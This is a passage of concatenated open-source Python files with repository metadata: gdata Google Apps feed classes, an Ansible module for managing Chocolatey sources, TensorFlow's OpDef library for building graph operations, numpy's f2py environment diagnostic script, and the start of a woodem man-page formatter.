return atom.CreateClassFromXMLString(EmailListRecipientFeed, xml_string)
class Property(atom.AtomBase):
"""The Google Apps Property element"""
_tag = 'property'
_namespace = APPS_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
_attributes['name'] = 'name'
_attributes['value'] = 'value'
def __init__(self, name=None, value=None, extension_elements=None,
extension_attributes=None, text=None):
self.name = name
self.value = value
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def PropertyFromString(xml_string):
return atom.CreateClassFromXMLString(Property, xml_string)
class PropertyEntry(gdata.GDataEntry):
"""A Google Apps Property flavor of an Atom Entry"""
_tag = 'entry'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataEntry._children.copy()
_attributes = gdata.GDataEntry._attributes.copy()
_children['{%s}property' % APPS_NAMESPACE] = ('property', [Property])
def __init__(self, author=None, category=None, content=None,
atom_id=None, link=None, published=None,
title=None, updated=None,
property=None,
extended_property=None,
extension_elements=None, extension_attributes=None, text=None):
gdata.GDataEntry.__init__(self, author=author, category=category,
content=content,
atom_id=atom_id, link=link, published=published,
title=title, updated=updated)
self.property = property
self.extended_property = extended_property or []
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def PropertyEntryFromString(xml_string):
return atom.CreateClassFromXMLString(PropertyEntry, xml_string)
class PropertyFeed(gdata.GDataFeed, gdata.LinkFinder):
"""A Google Apps Property feed flavor of an Atom Feed"""
_tag = 'feed'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataFeed._children.copy()
_attributes = gdata.GDataFeed._attributes.copy()
_children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry', [PropertyEntry])
def __init__(self, author=None, category=None, contributor=None,
generator=None, icon=None, atom_id=None, link=None, logo=None,
rights=None, subtitle=None, title=None, updated=None,
entry=None, total_results=None, start_index=None,
items_per_page=None, extension_elements=None,
extension_attributes=None, text=None):
gdata.GDataFeed.__init__(self, author=author, category=category,
contributor=contributor, generator=generator,
icon=icon, atom_id=atom_id, link=link,
logo=logo, rights=rights, subtitle=subtitle,
title=title, updated=updated, entry=entry,
total_results=total_results,
start_index=start_index,
items_per_page=items_per_page,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
def PropertyFeedFromString(xml_string):
return atom.CreateClassFromXMLString(PropertyFeed, xml_string)
|
apache-2.0
|
richardcs/ansible
|
lib/ansible/modules/windows/win_chocolatey_source.py
|
28
|
3512
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2018, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: win_chocolatey_source
version_added: '2.7'
short_description: Manages Chocolatey sources
description:
- Used to managed Chocolatey sources configured on the client.
- Requires Chocolatey to be already installed on the remote host.
options:
admin_only:
description:
- Makes the source visible to Administrators only.
- Requires Chocolatey >= 0.10.8.
- When creating a new source, this defaults to C(False).
type: bool
allow_self_service:
description:
- Allow the source to be used with self-service
- Requires Chocolatey >= 0.10.4.
- When creating a new source, this defaults to C(False).
type: bool
bypass_proxy:
description:
- Bypass the proxy when using this source.
- Requires Chocolatey >= 0.10.4.
- When creating a new source, this defaults to C(False).
type: bool
certificate:
description:
- The path to a .pfx file to use for X509 authenticated feeds.
- Requires Chocolatey >= 0.9.10.
certificate_password:
description:
- The password for I(certificate) if required.
- Requires Chocolatey >= 0.9.10.
name:
description:
- The name of the source to configure.
required: yes
priority:
description:
- The priority order of this source compared to other sources, lower is
better.
- All priorities above C(0) will be evaluated first, then zero-based values
will be evaluated in config file order.
- Requires Chocolatey >= 0.9.9.9.
- When creating a new source, this defaults to C(0).
type: int
source:
description:
- The file/folder/url of the source.
- Required when I(state) is C(present) or C(disabled).
source_username:
description:
- The username used to access I(source).
source_password:
description:
- The password for I(source_username).
- Required if I(source_username) is set.
state:
description:
- When C(absent), will remove the source.
- When C(disabled), will ensure the source exists but is disabled.
- When C(present), will ensure the source exists and is enabled.
choices:
- absent
- disabled
- present
default: present
update_password:
description:
- When C(always), the module will always set the password and report a
change if I(certificate_password) or I(source_password) is set.
- When C(on_create), the module will only set the password if the source
is being created.
choices:
- always
- on_create
default: always
author:
- Jordan Borean (@jborean93)
'''
EXAMPLES = r'''
- name: remove the default public source
win_chocolatey_source:
name: chocolatey
state: absent
- name: add new internal source
win_chocolatey_source:
name: internal repo
state: present
source: http://chocolatey-server/chocolatey
- name: create HTTP source with credentials
win_chocolatey_source:
name: internal repo
state: present
source: https://chocolatey-server/chocolatey
source_username: username
source_password: password
- name: disable Chocolatey source
win_chocolatey_source:
name: chocoaltey
state: disabled
'''
RETURN = r'''
'''
|
gpl-3.0
|
gibiansky/tensorflow
|
tensorflow/python/framework/op_def_library.py
|
19
|
30843
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Class to hold a library of OpDefs and use it to create Brain operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import six
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.framework import op_def_pb2
from tensorflow.core.framework import tensor_pb2
from tensorflow.core.framework import tensor_shape_pb2
from tensorflow.core.framework import types_pb2
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import compat
def _Attr(op_def, name):
for attr in op_def.attr:
if attr.name == name:
return attr
raise TypeError("Inconsistent OpDef for '%s', missing attr '%s'" %
(op_def.name, name))
def _AttrValue(attr_protos, name):
if name in attr_protos:
return attr_protos[name]
raise TypeError("Inconsistent OpDef, missing attr '%s' from '%s'." %
(name, attr_protos))
def _SatisfiesTypeConstraint(dtype, attr_def, param_name):
if attr_def.HasField("allowed_values"):
allowed_list = attr_def.allowed_values.list.type
if dtype not in allowed_list:
raise TypeError(
"Value passed to parameter '%s' has DataType %s not in list of "
"allowed values: %s" %
(param_name, dtypes.as_dtype(dtype).name,
", ".join(dtypes.as_dtype(x).name for x in allowed_list)))
def _IsListParameter(arg):
if arg.number_attr:
return True
elif arg.type_list_attr:
return True
return False
def _NumTypeFields(arg):
num = 0
if arg.type != types_pb2.DT_INVALID: num += 1
if arg.type_attr: num += 1
if arg.type_list_attr: num += 1
return num
def _IsListValue(v):
return isinstance(v, (list, tuple))
def _Flatten(l):
"""Converts [1, 2, [3, 4], [5]] to [1, 2, 3, 4, 5]."""
# [1, 2, [3, 4], [5]] -> [[1], [2], [3, 4], [5]]
l_of_l = [x if _IsListValue(x) else [x] for x in l]
# [[1], [2], [3, 4], [5]] -> [1, 2, 3, 4, 5]
return [item for sublist in l_of_l for item in sublist]
def _Restructure(l, structure):
"""Returns the elements of list l structured according to the given structure.
A structure is represented by a list whose elements are either
`None` or a non-negative integer. `None` corresponds to a single
element in the output list, and an integer N corresponds to a nested
list of length N.
The function returns a data structure whose shape is given by
`structure`, and whose elements are taken from `l`. If `structure`
is a singleton, the function returns the single data structure
implied by the 0th element of `structure`. For example:
_Restructure(["foo", "bar", "baz", "qux"], [None, 2, None])
-> ["foo", ["bar", "baz"], "qux"]
_Restructure(["foo"], [None]) -> "foo"
_Restructure(["foo"], [1]) -> ["foo"]
_Restructure([], [0]) -> []
Args:
l: A list.
structure: A list whose elements are either `None` or a non-negative
integer.
Returns:
The elements of `l`, restructured according to `structure`. If
`structure` is a list of length 1, this function returns the
single data structure implied by `structure[0]`.
"""
result = []
current_index = 0
for element in structure:
if element is None:
result.append(l[current_index])
current_index += 1
else:
result.append(l[current_index:current_index+element])
current_index += element
if len(result) == 1:
return result[0]
else:
return tuple(result)
def _MakeFloat(v, arg_name):
if not isinstance(v, compat.real_types):
raise TypeError("Expected float for argument '%s' not %s." %
(arg_name, repr(v)))
return float(v)
def _MakeInt(v, arg_name):
if isinstance(v, six.string_types):
raise TypeError("Expected int for argument '%s' not %s." %
(arg_name, repr(v)))
try:
return int(v)
except (ValueError, TypeError):
raise TypeError("Expected int for argument '%s' not %s." %
(arg_name, repr(v)))
def _MakeStr(v, arg_name):
if not isinstance(v, compat.bytes_or_text_types):
raise TypeError("Expected string for argument '%s' not %s." %
(arg_name, repr(v)))
return compat.as_bytes(v) # Convert unicode strings to bytes.
def _MakeBool(v, arg_name):
if not isinstance(v, bool):
raise TypeError("Expected bool for argument '%s' not %s." %
(arg_name, repr(v)))
return v
def _MakeType(v, attr_def):
try:
v = dtypes.as_dtype(v).base_dtype
except TypeError:
raise TypeError("Expected DataType for argument '%s' not %s." %
(attr_def.name, repr(v)))
i = v.as_datatype_enum
_SatisfiesTypeConstraint(i, attr_def, param_name=attr_def.name)
return i
def _MakeShape(v, arg_name):
"""Convert v into a TensorShapeProto."""
# Args:
# v: A TensorShapeProto, a list of ints, or a tensor_shape.TensorShape.
# arg_name: String, for error messages.
# Returns:
# A TensorShapeProto.
if isinstance(v, tensor_shape_pb2.TensorShapeProto):
for d in v.dim:
if d.name:
logging.warning("Warning: TensorShapeProto with a named dimension: %s",
str(v))
break
return v
return tensor_shape.as_shape(v).as_proto()
def _MakeTensor(v, arg_name):
"""Ensure v is a TensorProto."""
if isinstance(v, tensor_pb2.TensorProto):
return v
raise TypeError(
"Don't know how to convert %s to a TensorProto for argument '%s'" %
(repr(v), arg_name))
class _OpInfo(object):
"""All per-Op state we would like to precompute/validate."""
def __init__(self, op_def):
self.op_def = op_def
# TODO(josh11b): SWIG the ValidateOpDef() function from C++ and call it
# here, instead of these checks.
for arg in list(op_def.input_arg) + list(op_def.output_arg):
num_type_fields = _NumTypeFields(arg)
if num_type_fields != 1:
raise TypeError("Arg '%s' of '%s' must have one type field not %d" %
(arg.name, op_def.name, num_type_fields))
if arg.type_attr:
attr_type = _Attr(op_def, arg.type_attr).type
if attr_type != "type":
raise TypeError("Attr '%s' of '%s' used as a type_attr "
"but has type %s" %
(arg.type_attr, op_def.name, attr_type))
if arg.type_list_attr:
attr_type = _Attr(op_def, arg.type_list_attr).type
if attr_type != "list(type)":
raise TypeError(
"Attr '%s' of '%s' used as a type_list_attr but has type %s" %
(arg.type_attr, op_def.name, attr_type))
if arg.number_attr:
attr_type = _Attr(op_def, arg.number_attr).type
if attr_type != "int":
raise TypeError(
"Attr '%s' of '%s' used as a number_attr but has type %s" %
(arg.number_attr, op_def.name, attr_type))
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def _MaybeColocateWith(inputs):
"""A context manager for (maybe) colocating with a list of input tensors.
Args:
inputs: A list of `Tensor` or `Operation` objects.
Returns:
A context manager.
"""
if not inputs:
yield
else:
# NOTE(mrry): The `ops.colocate_with()` function accepts only a single
# op or tensor, so we create one context manager per element in the list.
with ops.colocate_with(inputs[0]), _MaybeColocateWith(inputs[1:]):
yield
# pylint: enable=g-doc-return-or-yield
class OpDefLibrary(object):
"""Holds a collection of OpDefs, can add the corresponding Ops to a graph."""
def __init__(self):
self._ops = {}
def add_op(self, op_def):
"""Register an OpDef. May call apply_op with the name afterwards."""
if not isinstance(op_def, op_def_pb2.OpDef):
raise TypeError("%s is %s, not an op_def_pb2.OpDef" %
(op_def, type(op_def)))
if not op_def.name:
raise ValueError("%s missing name." % op_def)
if op_def.name in self._ops:
raise RuntimeError("Op name %s registered twice." % op_def.name)
self._ops[op_def.name] = _OpInfo(op_def)
def add_op_list(self, op_list):
"""Register the OpDefs from an OpList."""
if not isinstance(op_list, op_def_pb2.OpList):
raise TypeError("%s is %s, not an op_def_pb2.OpList" %
(op_list, type(op_list)))
for op_def in op_list.op:
self.add_op(op_def)
def apply_op(self, op_type_name, name=None, **keywords):
# pylint: disable=g-doc-args
"""Add a node invoking a registered Op to a graph.
Example usage:
# input1 and input2 can be Tensors or anything ops.convert_to_tensor()
# will convert to a Tensor.
op_def_library.apply_op("op", input1=input1, input2=input2)
# Can specify a node name.
op_def_library.apply_op("op", input1=input1, name="node_name")
# Must use keyword arguments, with the names specified in the OpDef.
op_def_library.apply_op("op", input_name=input, attr_name=attr)
All attrs must either be inferred from an input or specified.
(If inferred, the attr must not be specified.) If an attr has a default
value specified in the Op's OpDef, then you may pass None as the value
of that attr to get the default.
Args:
op_type_name: string. Must match the name field of a registered Op.
name: string. Optional name of the created op.
**keywords: input Tensor and attr arguments specified by name,
and optional parameters to pass when constructing the Operation.
Returns:
The Tensor(s) representing the output of the operation, or the Operation
itself if there are no outputs.
Raises:
RuntimeError: On some errors.
TypeError: On some errors.
ValueError: On some errors.
"""
op_info = self._ops.get(op_type_name, None)
if op_info is None:
raise RuntimeError("Unrecognized Op name " + op_type_name)
op_def = op_info.op_def
# Determine the graph context.
try:
# Need to flatten all the arguments into a list.
# pylint: disable=protected-access
g = ops._get_graph_from_inputs(_Flatten(keywords.values()))
# pyline: enable=protected-access
except AssertionError as e:
raise RuntimeError(
"Cannot determine graph for Op '%s' due to: %s"
% (op_type_name, e.message))
# Default name if not specified.
if name is None:
name = op_type_name
# Check for deprecation
deprecation_version = op_def.deprecation.version
if deprecation_version:
producer = g.graph_def_versions.producer
if producer >= deprecation_version:
raise NotImplementedError(
("Op %s is not available in GraphDef version %d. "
"It has been removed in version %d. %s.") %
(op_type_name, producer, deprecation_version,
op_def.deprecation.explanation))
# Fill in the list of default types for all "type" attrs. This
# will be used to choose a preferred dtype to convert to in the
# absence of input type information.
#
# TODO(b/31302892): Currently the defaults don't work in the right
# way if you have two inputs, one of whose type resolution depends
# on the other. Handling this will require restructuring this code
# significantly.
default_type_attr_map = {}
for attr_def in op_def.attr:
if attr_def.type != "type":
continue
key = attr_def.name
if attr_def.HasField("default_value"):
default_type_attr_map[key] = dtypes.as_dtype(
attr_def.default_value.type)
# Requires that op_def has passed validation (using the C++
# ValidateOpDef() from ../framework/op_def_util.h).
attrs = {}
inputs = []
input_types = []
with g.as_default(), ops.name_scope(name) as scope:
# Perform input type inference
inferred_from = {}
for input_arg in op_def.input_arg:
input_name = input_arg.name
if input_name in keywords:
values = keywords.pop(input_name)
elif input_name + "_" in keywords:
# Handle the case where the name is a keyword or built-in
# for Python so we use the name + _ instead.
input_name += "_"
values = keywords.pop(input_name)
else:
raise TypeError("No argument for input " + input_name)
# Goals:
# * Convert values to Tensors if it contains constants.
# * Verify that values is a list if that matches the input_arg's
# type.
# * If the input_arg's type is determined by attrs, either set
# those attrs and validate those attr values are legal (if
# they have not yet been set) or validate the input matches
# the type indicated by the attrs (if they have already been
# inferred via an earlier input).
# * If the input_arg has an explicit type, make sure the input
# conforms.
if _IsListParameter(input_arg):
if not _IsListValue(values):
raise TypeError(
"Expected list for '%s' argument to '%s' Op, not %s." %
(input_name, op_type_name, values))
# In cases where we expect all elements of the list to have the
# same dtype, try to cast non-Tensor elements to that type.
dtype = None
default_dtype = None
if input_arg.type != types_pb2.DT_INVALID:
dtype = input_arg.type
elif input_arg.number_attr:
if input_arg.type_attr in attrs:
dtype = attrs[input_arg.type_attr]
else:
for t in values:
if isinstance(t, ops.Tensor):
dtype = t.dtype
break
# dtype still not found, prefer using the default dtype
# from the attr.
if dtype is None and input_arg.type_attr in default_type_attr_map:
default_dtype = default_type_attr_map[input_arg.type_attr]
try:
if not input_arg.is_ref and dtype:
dtype = dtypes.as_dtype(dtype).base_dtype
values = ops.internal_convert_n_to_tensor(
values,
name=input_arg.name,
dtype=dtype if dtype else None,
preferred_dtype=default_dtype,
as_ref=input_arg.is_ref)
if input_arg.number_attr and len(
set(v.dtype.base_dtype for v in values)) > 1:
raise TypeError() # All types should match.
except (TypeError, ValueError):
# What types does the conversion function think values have?
observed_types = []
for value in values:
try:
converted_value = ops.internal_convert_to_tensor(
value, as_ref=input_arg.is_ref)
observed_types.append(converted_value.dtype.base_dtype.name)
except (TypeError, ValueError):
observed_types.append("<NOT CONVERTIBLE TO TENSOR>")
observed = ", ".join(observed_types)
prefix = (
"Tensors in list passed to '%s' of '%s' Op have types [%s]" %
(input_name, op_type_name, observed))
if input_arg.number_attr:
if input_arg.type != types_pb2.DT_INVALID:
raise TypeError("%s that do not match expected type %s." %
(prefix, dtype.name))
elif input_arg.type_attr in attrs:
raise TypeError("%s that do not match type %s inferred from "
"earlier arguments." %
(prefix, dtype.name))
else:
raise TypeError("%s that don't all match." % prefix)
else:
raise TypeError("%s that are invalid." % prefix)
types = [x.dtype for x in values]
inputs.extend(values)
else:
# In cases where we have an expected type, try to convert non-Tensor
# arguments to that type.
dtype = None
default_dtype = None
if input_arg.type != types_pb2.DT_INVALID:
dtype = input_arg.type
elif input_arg.type_attr in attrs:
dtype = attrs[input_arg.type_attr]
elif input_arg.type_attr in default_type_attr_map:
# The dtype could not be inferred solely from the inputs,
# so we prefer the attr's default, so code that adds a new attr
# with a default is backwards compatible.
default_dtype = default_type_attr_map[input_arg.type_attr]
try:
values = ops.internal_convert_to_tensor(
values,
name=input_arg.name,
dtype=dtype,
as_ref=input_arg.is_ref,
preferred_dtype=default_dtype)
except TypeError as err:
if dtype is None:
raise err
else:
raise TypeError(
"Expected %s passed to parameter '%s' of op '%s', got %s of "
"type '%s' instead." %
(dtypes.as_dtype(dtype).name, input_arg.name, op_type_name,
repr(values), type(values).__name__))
except ValueError:
# What type does convert_to_tensor think it has?
observed = ops.internal_convert_to_tensor(
values, as_ref=input_arg.is_ref).dtype.name
prefix = ("Input '%s' of '%s' Op has type %s that does not match" %
(input_name, op_type_name, observed))
if input_arg.type != types_pb2.DT_INVALID:
raise TypeError("%s expected type of %s." %
(prefix, dtypes.as_dtype(input_arg.type).name))
else:
# Update the maps with the default, if needed.
k = input_arg.type_attr
if k in default_type_attr_map:
if k not in attrs:
attrs[k] = default_type_attr_map[k]
if k not in inferred_from:
inferred_from[k] = "Default in OpDef"
raise TypeError(
"%s type %s of argument '%s'." %
(prefix, dtypes.as_dtype(attrs[input_arg.type_attr]).name,
inferred_from[input_arg.type_attr]))
types = [values.dtype]
inputs.append(values)
base_types = [x.base_dtype for x in types]
if input_arg.number_attr:
# <number-attr> * <type> or <number-attr> * <type-attr>
if input_arg.number_attr in attrs:
if len(values) != attrs[input_arg.number_attr]:
raise ValueError(
"List argument '%s' to '%s' Op with length %d must match "
"length %d of argument '%s'." %
(input_name, op_type_name, len(values),
attrs[input_arg.number_attr],
inferred_from[input_arg.number_attr]))
else:
attrs[input_arg.number_attr] = len(values)
inferred_from[input_arg.number_attr] = input_name
num_attr = _Attr(op_def, input_arg.number_attr)
if num_attr.has_minimum and len(values) < num_attr.minimum:
raise ValueError(
"List argument '%s' to '%s' Op with length %d shorter "
"than minimum length %d." %
(input_name, op_type_name, len(values), num_attr.minimum))
# All tensors must have the same base type.
if any([bt != base_types[0] for bt in base_types]):
raise TypeError(
"All tensors passed to '%s' of '%s' Op "
"must have the same type." %
(input_name, op_type_name))
if input_arg.type != types_pb2.DT_INVALID:
# <number-attr> * <type> case
if base_types and base_types[0] != input_arg.type:
assert False, "Unreachable"
elif input_arg.type_attr in attrs:
# <number-attr> * <type-attr> case, where <type-attr> already
# has an inferred value.
if base_types and base_types[0] != attrs[input_arg.type_attr]:
assert False, "Unreachable"
else:
# <number-attr> * <type-attr> case, where we are now setting
# the <type-attr> based on this input
if not base_types:
raise TypeError(
"Don't know how to infer type variable from empty input "
"list passed to input '%s' of '%s' Op." %
(input_name, op_type_name))
attrs[input_arg.type_attr] = base_types[0]
inferred_from[input_arg.type_attr] = input_name
type_attr = _Attr(op_def, input_arg.type_attr)
_SatisfiesTypeConstraint(base_types[0], type_attr,
param_name=input_name)
elif input_arg.type_attr:
# <type-attr>
attr_value = base_types[0]
if input_arg.type_attr in attrs:
if attrs[input_arg.type_attr] != attr_value:
assert False, "Unreachable"
else:
for base_type in base_types:
_SatisfiesTypeConstraint(base_type,
_Attr(op_def, input_arg.type_attr),
param_name=input_name)
attrs[input_arg.type_attr] = attr_value
inferred_from[input_arg.type_attr] = input_name
elif input_arg.type_list_attr:
# <type-list-attr>
attr_value = base_types
if input_arg.type_list_attr in attrs:
if attrs[input_arg.type_list_attr] != attr_value:
raise TypeError(
"Input '%s' of '%s' Op has type list of %s that does not "
"match type list %s of argument '%s'." %
(input_name, op_type_name,
", ".join(dtypes.as_dtype(x).name for x in attr_value),
", ".join(dtypes.as_dtype(x).name
for x in attrs[input_arg.type_list_attr]),
inferred_from[input_arg.type_list_attr]))
else:
for base_type in base_types:
_SatisfiesTypeConstraint(base_type,
_Attr(op_def, input_arg.type_list_attr),
param_name=input_name)
attrs[input_arg.type_list_attr] = attr_value
inferred_from[input_arg.type_list_attr] = input_name
else:
# single Tensor with specified type
if base_types[0] != input_arg.type:
assert False, "Unreachable"
if input_arg.is_ref:
if not all(x._is_ref_dtype for x in types): # pylint: disable=protected-access
raise TypeError(
"Input '%s' of '%s' Op requires l-value input" %
(input_name, op_type_name))
input_types.extend(types)
else:
input_types.extend(base_types)
# Process remaining attrs
for attr in op_def.attr:
# Skip attrs that have already had their values inferred
if attr.name in attrs:
if attr.name in keywords:
raise TypeError(
"Should not specify value for inferred attr '%s'." % attr.name)
continue
if attr.name in keywords:
attrs[attr.name] = keywords.pop(attr.name)
elif attr.name + "_" in keywords:
# Attrs whose names match Python keywords have an extra '_'
# appended, so we must check for that as well.
attrs[attr.name] = keywords.pop(attr.name + "_")
else:
raise TypeError("No argument for attr " + attr.name)
# Convert attr values to AttrValue protos.
attr_protos = {}
for attr_def in op_def.attr:
key = attr_def.name
value = attrs[key]
attr_value = attr_value_pb2.AttrValue()
if attr_def.HasField("default_value") and value is None:
attr_value.CopyFrom(attr_def.default_value)
attr_protos[key] = attr_value
continue
if attr_def.type.startswith("list("):
if not _IsListValue(value):
raise TypeError("Expected list for attr " + key)
if attr_def.has_minimum:
if len(value) < attr_def.minimum:
raise ValueError("Attr '%s' of '%s' Op passed list of length %d "
"less than minimum %d." %
(key, op_type_name, len(value),
attr_def.minimum))
attr_value.list.SetInParent()
if attr_def.type == "string":
attr_value.s = _MakeStr(value, key)
if attr_def.HasField("allowed_values"):
if attr_value.s not in attr_def.allowed_values.list.s:
raise ValueError(
"Attr '%s' of '%s' Op passed string '%s' not in: \"%s\"." %
(key, op_type_name, compat.as_text(attr_value.s),
'", "'.join(map(compat.as_text,
attr_def.allowed_values.list.s))))
elif attr_def.type == "list(string)":
attr_value.list.s.extend([_MakeStr(x, key) for x in value])
if attr_def.HasField("allowed_values"):
for x in attr_value.list.s:
if x not in attr_def.allowed_values.list.s:
raise ValueError(
"Attr '%s' of '%s' Op passed string '%s' not in: \"%s\"." %
(key, op_type_name, compat.as_text(x),
'", "'.join(map(compat.as_text,
attr_def.allowed_values.list.s))))
elif attr_def.type == "int":
attr_value.i = _MakeInt(value, key)
if attr_def.has_minimum:
if attr_value.i < attr_def.minimum:
raise ValueError(
"Attr '%s' of '%s' Op passed %d less than minimum %d." %
(key, op_type_name, attr_value.i, attr_def.minimum))
elif attr_def.type == "list(int)":
attr_value.list.i.extend([_MakeInt(x, key) for x in value])
elif attr_def.type == "float":
attr_value.f = _MakeFloat(value, key)
elif attr_def.type == "list(float)":
attr_value.list.f.extend([_MakeFloat(x, key) for x in value])
elif attr_def.type == "bool":
attr_value.b = _MakeBool(value, key)
elif attr_def.type == "list(bool)":
attr_value.list.b.extend([_MakeBool(x, key) for x in value])
elif attr_def.type == "type":
attr_value.type = _MakeType(value, attr_def)
elif attr_def.type == "list(type)":
attr_value.list.type.extend(
[_MakeType(x, attr_def) for x in value])
elif attr_def.type == "shape":
attr_value.shape.CopyFrom(_MakeShape(value, key))
elif attr_def.type == "list(shape)":
attr_value.list.shape.extend(
[_MakeShape(x, key) for x in value])
elif attr_def.type == "tensor":
attr_value.tensor.CopyFrom(_MakeTensor(value, key))
elif attr_def.type == "list(tensor)":
attr_value.list.tensor.extend(
[_MakeTensor(x, key) for x in value])
elif attr_def.type == "func":
if isinstance(value, attr_value_pb2.NameAttrList):
attr_value.func.CopyFrom(value)
elif isinstance(value, compat.bytes_or_text_types):
attr_value.func.name = value
else:
value.add_to_graph(ops.get_default_graph())
attr_value.func.name = value.name
else:
raise TypeError("Unrecognized Attr type " + attr_def.type)
attr_protos[key] = attr_value
del attrs # attrs is no longer authoritative, use attr_protos instead
# Determine output types (possibly using attrs)
output_types = []
output_structure = []
for arg in op_def.output_arg:
types = []
if arg.number_attr:
n = _AttrValue(attr_protos, arg.number_attr).i
if arg.type_attr:
types = [_AttrValue(attr_protos, arg.type_attr).type] * n
else:
types = [arg.type] * n
output_structure.append(n)
elif arg.type_attr:
t = _AttrValue(attr_protos, arg.type_attr)
types = [t.type]
output_structure.append(None)
elif arg.type_list_attr:
t = _AttrValue(attr_protos, arg.type_list_attr)
types = t.list.type
output_structure.append(len(types))
else:
types = [arg.type]
output_structure.append(None)
if arg.is_ref:
types = [dtypes.as_dtype(x)._as_ref for x in types] # pylint: disable=protected-access
output_types.extend(types)
if keywords:
raise TypeError("apply_op() got unexpected keyword arguments: " +
", ".join(sorted(keywords.keys())))
# NOTE(mrry): We add an explicit colocation constraint between
# the newly created op and any of its reference-typed inputs.
must_colocate_inputs = [val for arg, val in zip(op_def.input_arg, inputs)
if arg.is_ref]
with _MaybeColocateWith(must_colocate_inputs):
# Add Op to graph
op = g.create_op(op_type_name, inputs, output_types, name=scope,
input_types=input_types, attrs=attr_protos,
op_def=op_def)
if output_structure:
outputs = op.outputs
res = _Restructure(ops.convert_n_to_tensor(outputs), output_structure)
if isinstance(res, list) and not res and op_def.is_stateful:
return op
else:
return res
else:
return op
|
apache-2.0
|
bringingheavendown/numpy
|
numpy/f2py/diagnose.py
|
188
|
5295
|
#!/usr/bin/env python
from __future__ import division, absolute_import, print_function
import os
import sys
import tempfile
def run_command(cmd):
print('Running %r:' % (cmd))
os.system(cmd)
print('------')
def run():
_path = os.getcwd()
os.chdir(tempfile.gettempdir())
print('------')
print('os.name=%r' % (os.name))
print('------')
print('sys.platform=%r' % (sys.platform))
print('------')
print('sys.version:')
print(sys.version)
print('------')
print('sys.prefix:')
print(sys.prefix)
print('------')
print('sys.path=%r' % (':'.join(sys.path)))
print('------')
try:
import numpy
has_newnumpy = 1
except ImportError:
print('Failed to import new numpy:', sys.exc_info()[1])
has_newnumpy = 0
try:
from numpy.f2py import f2py2e
has_f2py2e = 1
except ImportError:
print('Failed to import f2py2e:', sys.exc_info()[1])
has_f2py2e = 0
try:
import numpy.distutils
has_numpy_distutils = 2
except ImportError:
try:
import numpy_distutils
has_numpy_distutils = 1
except ImportError:
print('Failed to import numpy_distutils:', sys.exc_info()[1])
has_numpy_distutils = 0
if has_newnumpy:
try:
print('Found new numpy version %r in %s' %
(numpy.__version__, numpy.__file__))
except Exception as msg:
print('error:', msg)
print('------')
if has_f2py2e:
try:
print('Found f2py2e version %r in %s' %
(f2py2e.__version__.version, f2py2e.__file__))
except Exception as msg:
print('error:', msg)
print('------')
if has_numpy_distutils:
try:
if has_numpy_distutils == 2:
print('Found numpy.distutils version %r in %r' % (
numpy.distutils.__version__,
numpy.distutils.__file__))
else:
print('Found numpy_distutils version %r in %r' % (
numpy_distutils.numpy_distutils_version.numpy_distutils_version,
numpy_distutils.__file__))
print('------')
except Exception as msg:
print('error:', msg)
print('------')
try:
if has_numpy_distutils == 1:
print(
'Importing numpy_distutils.command.build_flib ...', end=' ')
import numpy_distutils.command.build_flib as build_flib
print('ok')
print('------')
try:
print(
'Checking availability of supported Fortran compilers:')
for compiler_class in build_flib.all_compilers:
compiler_class(verbose=1).is_available()
print('------')
except Exception as msg:
print('error:', msg)
print('------')
except Exception as msg:
print(
'error:', msg, '(ignore it, build_flib is obsolute for numpy.distutils 0.2.2 and up)')
print('------')
try:
if has_numpy_distutils == 2:
print('Importing numpy.distutils.fcompiler ...', end=' ')
import numpy.distutils.fcompiler as fcompiler
else:
print('Importing numpy_distutils.fcompiler ...', end=' ')
import numpy_distutils.fcompiler as fcompiler
print('ok')
print('------')
try:
print('Checking availability of supported Fortran compilers:')
fcompiler.show_fcompilers()
print('------')
except Exception as msg:
print('error:', msg)
print('------')
except Exception as msg:
print('error:', msg)
print('------')
try:
if has_numpy_distutils == 2:
print('Importing numpy.distutils.cpuinfo ...', end=' ')
from numpy.distutils.cpuinfo import cpuinfo
print('ok')
print('------')
else:
try:
print(
'Importing numpy_distutils.command.cpuinfo ...', end=' ')
from numpy_distutils.command.cpuinfo import cpuinfo
print('ok')
print('------')
except Exception as msg:
print('error:', msg, '(ignore it)')
print('Importing numpy_distutils.cpuinfo ...', end=' ')
from numpy_distutils.cpuinfo import cpuinfo
print('ok')
print('------')
cpu = cpuinfo()
print('CPU information:', end=' ')
for name in dir(cpuinfo):
if name[0] == '_' and name[1] != '_' and getattr(cpu, name[1:])():
print(name[1:], end=' ')
print('------')
except Exception as msg:
print('error:', msg)
print('------')
os.chdir(_path)
if __name__ == "__main__":
run()
|
bsd-3-clause
|
gladk/woodem
|
py/manpage.py
|
3
|
3054
|
# coding: utf-8
#
# Thanks to logilab for this code.
#
# Copied from the logilab.common.optik_ext module (GPL-licensed) and modified for woo.
#
import optparse,time
class ManHelpFormatter(optparse.HelpFormatter):
"""Format help using man pages ROFF format"""
def __init__(self,indent_increment=0,max_help_position=24,width=79,short_first=0):
